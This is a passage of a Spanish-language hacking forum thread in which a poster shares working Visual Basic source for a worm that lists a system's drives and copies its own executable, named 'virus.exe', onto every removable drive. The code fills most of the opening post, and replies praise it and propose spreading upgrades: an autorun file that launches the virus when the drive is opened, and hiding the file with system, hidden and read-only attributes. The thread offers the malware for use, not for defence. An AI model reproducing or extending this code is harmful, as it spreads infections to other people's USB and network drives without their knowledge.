elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [Source] Infectar unidades extraibles (pendrive), unidades de red, etc...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [Source] Infectar unidades extraibles (pendrive), unidades de red, etc...  (Leído 8,783 veces)
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
[Source] Infectar unidades extraibles (pendrive), unidades de red, etc...
« en: 3 Abril 2007, 00:03 am »

Este sencillo código permite enumerar todas las unidades del sistema, descubrir de que tipo son (fijas, extraibles, CD, remotas, etc...) y copiar el virus en su interior.

Código
  1. Private Declare Function GetLogicalDrives Lib "kernel32" () As Long
  2. Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long
  3. Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
  4.  
  5. Const DRIVE_REMOVABLE = 2
  6. Const DRIVE_FIXED = 3
  7. Const DRIVE_REMOTE = 4
  8. Const DRIVE_CDROM = 5
  9. Const DRIVE_RAMDISK = 6
  10.  
  11. 'Función para enumerar todas las unidades (sean del tipo que sean)
  12. Function EnumDrives() As String
  13.    Dim i As Long
  14.    Dim tmp As Long
  15.    Dim drives As String
  16.  
  17.    tmp = GetLogicalDrives()
  18.    If tmp Then
  19.        For i = 0 To 25
  20.            If (tmp And 2 ^ i) <> 0 Then
  21.                drives = drives & Chr$(i + 65) & ":#"
  22.            End If
  23.        Next
  24.    End If
  25.    EnumDrives = drives
  26.    'La variable drives almacena todas
  27.    'las unidades en formato "A:#C:#D:#E:#"
  28. End Function
  29.  
  30. Function GetType(ByVal drives As String)
  31.    Dim tmp() As String
  32.  
  33.    'Separamos las unidades según el caracter #
  34.    tmp = Split(drives, "#")
  35.    For i = 0 To UBound(tmp) - 1
  36.        If GetDriveType(tmp(i)) = DRIVE_REMOVABLE Then
  37.            'Llamamos a la función de infectar la unidad
  38.            'si es del tipo DRIVE_REMOVABLE
  39.            Call InfectDrive("virus.exe", tmp(i))
  40.        End If
  41.    Next
  42. End Function
  43.  
  44. Function InfectDrive(ByVal FileName As String, ByVal drive As String) As Boolean
  45.    'Importante, no siempre tenemos acceso de escritura
  46.    'en las unidades, sin esta linea podríamos "matar"
  47.    'nuestro virus :(
  48.    On Error Resume Next
  49.  
  50.    Dim MySelf As String
  51.    MySelf = String$(255, Chr$(0))
  52.  
  53.    'Obtenemos nuestra propia ruta
  54.    GetModuleFileName 0, MySelf, Len(MySelf)
  55.    'Nos copiamos en la unidad con el nombre de "virus.exe"
  56.    FileCopy MySelf, drive & "\" & FileName
  57. End Function
  58.  
  59. Private Sub Form_Load()
  60.    'Empieza la juerga!
  61.    Call GetType(EnumDrives)
  62. End Sub
  63.  

El código está comentado y no tiene mucha complicación, copiar y pegar en un proyecto nuevo y os funcionará.

Decirme si os gusta, si se puede mejorar algo, añadir funciones, etc...

Saludos!! vuestro amigo ||MadAntrax||


« Última modificación: 30 Junio 2007, 15:16 pm por ||MadAntrax|| » En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
Tyrz


Desconectado Desconectado

Mensajes: 927


Get big or die tryin'


Ver Perfil WWW
Re: [Source] Infectar unidades estraibles (pendrive), unidades de red, etc...
« Respuesta #1 en: 3 Abril 2007, 00:05 am »

muy guapo tio como siempre;D


En línea

Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en  Surf
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: [Source] Infectar unidades estraibles (pendrive), unidades de red, etc...
« Respuesta #2 en: 3 Abril 2007, 00:05 am »

Joe ultimamente estas q regalas los codigos xDD gracias (de nuevo) ;)
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [Source] Infectar unidades estraibles (pendrive), unidades de red, etc...
« Respuesta #3 en: 3 Abril 2007, 00:08 am »

Joe ultimamente estas q regalas los codigos xDD gracias (de nuevo)
Digamos que tengo una época generosa... tengo más códigos para regalar pero los publicaré poquito a poco, tantos de golpe no se asimilan bien

Saludos!!



Se me ocurre una mejora: Hacer que el código cree el archivo autorun.ini con el path apuntando al virus, de esta forma consigues que nuestro EXE se ejecute al hacer doble click en las unidades de red, solo me falta saber si tambien afecta en los otros tipos de unidad.

Proponer algo :P
« Última modificación: 3 Abril 2007, 00:23 am por ||MadAntrax|| » En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
Jareth


Desconectado Desconectado

Mensajes: 334



Ver Perfil
Re: [Source] Infectar unidades extraibles (pendrive), unidades de red, etc...
« Respuesta #4 en: 3 Abril 2007, 00:30 am »


Digamos que tengo una época generosa... tengo más códigos para regalar pero los publicaré poquito a poco, tantos de golpe no se asimilan bien

Saludos!!
Joer pues a seguir publicando codigos,que son muy interesantes y de gran ayuda.Espero con ansias tu siguiente aporte  ;).
Saludos y gracias.
En línea

Rudy21

Desconectado Desconectado

Mensajes: 154


Rudy21 Web Design


Ver Perfil WWW
Re: [Source] Infectar unidades extraibles (pendrive), unidades de red, etc...
« Respuesta #5 en: 3 Abril 2007, 20:27 pm »

Si Despues de crear el autorun.inf usas shell y lo pones en vbhide y le pones attrib +s +h +r lo pones como archivo oculto yd e sistema aunke vea los ocultos no c ve jejeje


Salu2
En línea


Meg


Desconectado Desconectado

Mensajes: 462



Ver Perfil
Re: [Source] Infectar unidades extraibles (pendrive), unidades de red, etc...
« Respuesta #6 en: 3 Abril 2007, 22:33 pm »

podrias poner un post con todos tus codigos,en ese post se blokea y se le pone chincheta,yo creo k seria lo mejor para tener recopilados todos tus codigos ya que son buenos y utiles... solo es una idea xD que os parece??
En línea

Tyrz


Desconectado Desconectado

Mensajes: 927


Get big or die tryin'


Ver Perfil WWW
Re: [Source] Infectar unidades extraibles (pendrive), unidades de red, etc...
« Respuesta #7 en: 3 Abril 2007, 23:24 pm »

a mi me parece buena idea
En línea

Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en  Surf
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [Source] Infectar unidades extraibles (pendrive), unidades de red, etc...
« Respuesta #8 en: 4 Abril 2007, 01:01 am »

podrias poner un post con todos tus codigos,en ese post se blokea y se le pone chincheta,yo creo k seria lo mejor para tener recopilados todos tus codigos ya que son buenos y utiles... solo es una idea xD que os parece??
Ummm, no creo que merezca un trato especial para mi sources, prefiero ir abriendo un post para cada source, asi lo podemos comentar y mejorar, si los pongo todos en uno se juntarán todas las dudas/sujerencias/mejoras y será un lío...

Gracias igualmente
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: [Source] Infectar unidades extraibles (pendrive), unidades de red, etc...
« Respuesta #9 en: 4 Abril 2007, 01:24 am »

Si kieres ponerlos en kizar.net yo me encargo de q tenga chincheta, una recopilacion asi siempre es util ;)
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines